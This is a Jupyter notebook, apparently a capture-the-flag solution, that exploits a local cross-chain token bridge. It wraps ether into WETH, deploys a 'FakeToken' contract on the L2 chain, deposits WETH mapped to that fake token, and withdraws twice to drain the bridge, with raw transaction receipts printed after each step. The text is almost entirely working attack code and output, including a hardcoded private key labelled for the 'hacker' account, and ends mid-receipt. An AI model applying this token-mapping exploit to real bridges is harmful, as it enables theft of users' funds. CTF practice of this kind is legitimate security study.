In [69]:
from web3 import Web3
import solcx

node_url_1 = "http://127.0.0.1:8545/gWVHfRVPdBwThuLhzgfuzlMc/l1"
node_url_2 = node_url_1[:-2] + 'l2'
w3 = Web3(Web3.HTTPProvider(node_url_1)) 
assert w3.is_connected()
w4 = Web3(Web3.HTTPProvider(node_url_2)) 
assert w4.is_connected()

sk_hacker = '0x2f80caa809a981cf18b5be5f4c4fb276f3dc0237c48eb1abcdcf6bd35fcc45ad'
target = '0xa71af34Df17f53f9e56B97F731A53A3bd9A918C4'
account = w3.eth.account.from_key(sk_hacker)
address = account.address

def eth_transact(w, tx):
    global sk_hacker
    txn = w.eth.account.sign_transaction(tx, sk_hacker)
    tx_hash = w.eth.send_raw_transaction(txn.rawTransaction)
    tx_receipt = w.eth.wait_for_transaction_receipt(tx_hash)
    assert tx_receipt['status'] == 1
    return tx_receipt


abi = solcx.compile_files('challenge.sol',output_values=['abi'])['challenge.sol:Challenge']['abi']
contract = w3.eth.contract(address=target, abi=abi)
weth = contract.functions.WETH().call()
bridge = contract.functions.BRIDGE().call()
msger = contract.functions.MESSENGER().call()
abi = solcx.compile_files('ERC20.sol',output_values=['abi'])['ERC20.sol:IERC20']['abi']
contract = w3.eth.contract(address=weth, abi=abi)
amt = contract.functions.balanceOf(bridge).call()

# a=func_sig('l1Token()')
# b=func_sig('mint(address,uint256)')
# c=func_sig("burn(address,uint256)")
# result = bytearray(a ^ b ^ c for a, b, c in zip(bytearray(a), bytearray(b), bytearray(c)))
# func_sig('mint(address,uint256)')

L2_ERC20_BRIDGE = '0x420000000000000000000000000000000000baBe'
L2_WETH = '0xDeadDeAddeAddEAddeadDEaDDEAdDeaDDeAD0000'


In [70]:
# 将ether先换一点成weth

abi = solcx.compile_files('L1WETH.sol',output_values=['abi'])['L1WETH.sol:WETH']['abi']
L1WETH = w3.eth.contract(address=weth, abi=abi)

# 5. Build increment tx
tx = L1WETH.functions.deposit().build_transaction(
    {
        "value": amt,
        "from": w3.to_checksum_address(address),
        "nonce": w3.eth.get_transaction_count(
            w3.to_checksum_address(address)
        ),
    }
)
eth_transact(w3, tx)


AttributeDict({'transactionHash': HexBytes('0x802bc3dd0e23c71e9eee80dc525de0fd0f1be930346100311cd45ee7c800e97e'),
 'transactionIndex': 0,
 'blockHash': HexBytes('0x387f73ccef8f11924711ad50c61d0b26ac9def6ab13259b11d789f3b1448d470'),
 'blockNumber': 8,
 'cumulativeGasUsed': 52098,
 'gasUsed': 52098,
 'effectiveGasPrice': 2204852260,
 'from': '0x205127B7121BAe1404e222AA79D32965aF40326B',
 'to': '0xeEA89361F1CF52Ea988bC4B12e2312e2C6735a7e',
 'contractAddress': None,
 'logs': [AttributeDict({'address': '0xeEA89361F1CF52Ea988bC4B12e2312e2C6735a7e',
   'topics': [HexBytes('0xddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef'),
    HexBytes('0x0000000000000000000000000000000000000000000000000000000000000000'),
    HexBytes('0x000000000000000000000000205127b7121bae1404e222aa79d32965af40326b')],
   'data': HexBytes('0x0000000000000000000000000000000000000000000000001bc16d674ec80000'),
   'blockHash': HexBytes('0x387f73ccef8f11924711ad50c61d0b26ac9def6ab13259b11d789f3b1448d470'),
 

In [71]:
# approve
abi = solcx.compile_files('ERC20.sol',output_values=['abi'])['ERC20.sol:IERC20']['abi']
L1WETH = w3.eth.contract(address=weth, abi=abi)

increment_tx = L1WETH.functions.approve(bridge, amt).build_transaction(
    {
        "from": w3.to_checksum_address(address),
        "nonce": w3.eth.get_transaction_count(w3.to_checksum_address(address)),
    }
)
eth_transact(w3, increment_tx)

AttributeDict({'transactionHash': HexBytes('0x34537c5eee621ef35a8836443a23271ae719b63380eb3715f8f938fc140f2297'),
 'transactionIndex': 0,
 'blockHash': HexBytes('0x25405c4328e059d4c966b1ae50b6b42c06d2ebebb7d603860018c9da230edc78'),
 'blockNumber': 9,
 'cumulativeGasUsed': 46371,
 'gasUsed': 46371,
 'effectiveGasPrice': 2054768815,
 'from': '0x205127B7121BAe1404e222AA79D32965aF40326B',
 'to': '0xeEA89361F1CF52Ea988bC4B12e2312e2C6735a7e',
 'contractAddress': None,
 'logs': [AttributeDict({'address': '0xeEA89361F1CF52Ea988bC4B12e2312e2C6735a7e',
   'topics': [HexBytes('0x8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925'),
    HexBytes('0x000000000000000000000000205127b7121bae1404e222aa79d32965af40326b'),
    HexBytes('0x000000000000000000000000fd076bb48132fe965c59d44398d1b7d6a8fe4c77')],
   'data': HexBytes('0x0000000000000000000000000000000000000000000000001bc16d674ec80000'),
   'blockHash': HexBytes('0x25405c4328e059d4c966b1ae50b6b42c06d2ebebb7d603860018c9da230edc78'),
 

In [72]:
temp_file = solcx.compile_files('Hacker.sol', output_values=['abi', 'bin'])
abi = temp_file['Hacker.sol:FakeToken']['abi']
bytecode = temp_file['Hacker.sol:FakeToken']['bin']
Incrementer = w4.eth.contract(abi=abi, bytecode=bytecode)
construct_txn = Incrementer.constructor(weth).build_transaction(
    {
        "from": w4.to_checksum_address(address),
        "nonce": w4.eth.get_transaction_count(
            w4.to_checksum_address(address)
        ),
    }
)
tx_receipt = eth_transact(w4, construct_txn)
tx_receipt

AttributeDict({'transactionHash': HexBytes('0x8cea2c34dd94ad48a89add37bfe3e6d9c38024cfa64a760d0564072229af13f3'),
 'transactionIndex': 0,
 'blockHash': HexBytes('0x3e4bad2c5962c3e7f07dc1917894e1376438c98b9bffa4cadea294df4c75a237'),
 'blockNumber': 2,
 'cumulativeGasUsed': 187216,
 'gasUsed': 187216,
 'effectiveGasPrice': 3628066900,
 'from': '0x205127B7121BAe1404e222AA79D32965aF40326B',
 'to': None,
 'contractAddress': '0x0b30f6b7F98BF6e01716Ef01aDFD62aB9eeBD65e',
 'logs': [],
 'logsBloom': HexBytes('0x000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000

In [73]:
faketoken = tx_receipt.contractAddress

abi = solcx.compile_files('L1ERC20Bridge.sol',output_values=['abi'])['L1ERC20Bridge.sol:L1ERC20Bridge']['abi']
contract = w3.eth.contract(address=bridge, abi=abi)
print(weth, faketoken, amt)
depositERC20_txn = contract.functions.depositERC20(weth, faketoken, amt).build_transaction(
    {
        "from": w3.to_checksum_address(address),
        "nonce": w3.eth.get_transaction_count(
            w3.to_checksum_address(address)
        ),
    }
)

eth_transact(w3, depositERC20_txn)



0xeEA89361F1CF52Ea988bC4B12e2312e2C6735a7e 0x0b30f6b7F98BF6e01716Ef01aDFD62aB9eeBD65e 2000000000000000000


AttributeDict({'transactionHash': HexBytes('0xa2af92c9b054e6085275b90134336e40a9218ab289235202cbfee410ced5ce8c'),
 'transactionIndex': 0,
 'blockHash': HexBytes('0xf76d9ad22b8d13983dbffa21060b1a369b5db0ec7c9107ecb508f08bf24bd561'),
 'blockNumber': 10,
 'cumulativeGasUsed': 104526,
 'gasUsed': 104526,
 'effectiveGasPrice': 1923330304,
 'from': '0x205127B7121BAe1404e222AA79D32965aF40326B',
 'to': '0xfd076bB48132fE965c59D44398d1b7d6A8fe4C77',
 'contractAddress': None,
 'logs': [AttributeDict({'address': '0xeEA89361F1CF52Ea988bC4B12e2312e2C6735a7e',
   'topics': [HexBytes('0xddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef'),
    HexBytes('0x000000000000000000000000205127b7121bae1404e222aa79d32965af40326b'),
    HexBytes('0x000000000000000000000000fd076bb48132fe965c59d44398d1b7d6a8fe4c77')],
   'data': HexBytes('0x0000000000000000000000000000000000000000000000001bc16d674ec80000'),
   'blockHash': HexBytes('0xf76d9ad22b8d13983dbffa21060b1a369b5db0ec7c9107ecb508f08bf24bd561')

In [74]:
############ L2 start

abi = solcx.compile_files('IL2ERC20Bridge.sol',output_values=['abi'])['IL2ERC20Bridge.sol:IL2ERC20Bridge']['abi']
contract = w4.eth.contract(address=L2_ERC20_BRIDGE, abi=abi)
tx = contract.functions.withdraw(L2_WETH, amt).build_transaction(
    {
        "from": w4.to_checksum_address(address),
        "nonce": w4.eth.get_transaction_count( w4.to_checksum_address(address) ),
    }
)
eth_transact(w4, tx)

AttributeDict({'transactionHash': HexBytes('0x858d36217105944b57fd345f093a61102fd018d2aa5f9ceffbf3dddbfb97730a'),
 'transactionIndex': 0,
 'blockHash': HexBytes('0x636236e2e7b073b22296a22eaa14621cdcfcd7b32dd35f4d78c2b73f6ce37b5d'),
 'blockNumber': 4,
 'cumulativeGasUsed': 97643,
 'gasUsed': 97643,
 'effectiveGasPrice': 3017728330,
 'from': '0x205127B7121BAe1404e222AA79D32965aF40326B',
 'to': '0x420000000000000000000000000000000000baBe',
 'contractAddress': None,
 'logs': [AttributeDict({'address': '0xDeadDeAddeAddEAddeadDEaDDEAdDeaDDeAD0000',
   'topics': [HexBytes('0xddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef'),
    HexBytes('0x000000000000000000000000205127b7121bae1404e222aa79d32965af40326b'),
    HexBytes('0x0000000000000000000000000000000000000000000000000000000000000000')],
   'data': HexBytes('0x0000000000000000000000000000000000000000000000001bc16d674ec80000'),
   'blockHash': HexBytes('0x636236e2e7b073b22296a22eaa14621cdcfcd7b32dd35f4d78c2b73f6ce37b5d'),
 

In [75]:
tx = contract.functions.withdraw(faketoken, amt).build_transaction(
    {
        "from": w4.to_checksum_address(address),
        "nonce": w4.eth.get_transaction_count(w4.to_checksum_address(address)),
    }
)

eth_transact(w4, tx)

AttributeDict({'transactionHash': HexBytes('0xc8a08390a265dab086f9bb2575ad59e0cd795cd4663f93d9409131038fce8948'),
 'transactionIndex': 0,
 'blockHash': HexBytes('0x7ac9107e9b447866efd7ee1d1c73098406d006ab38c66e9cfbd9bf4ad037178d'),
 'blockNumber': 5,
 'cumulativeGasUsed': 72986,
 'gasUsed': 72986,
 'effectiveGasPrice': 2767154098,
 'from': '0x205127B7121BAe1404e222AA79D32965aF40326B',
 'to': '0x420000000000000000000000000000000000baBe',
 'contractAddress': None,
 'logs': [AttributeDict({'address': '0x420000000000000000000000000000000000CAFe',
   'topics': [HexBytes('0xa69df1731757639e5476682a80b6e7230692dfcf7f8889393de3d21fd4579bce'),
    HexBytes('0x000000000000000000000000fd076bb48132fe965c59d44398d1b7d6a8fe4c77')],
   'data': HexBytes('0x000000000000000000000000420000000000000000000000000000000000babe00000000000000000000000000000000000000000000000000000000000000600000000000000000000000000000000000000000000000000000000000000001000000000000000000000000000000000000000000000000000000000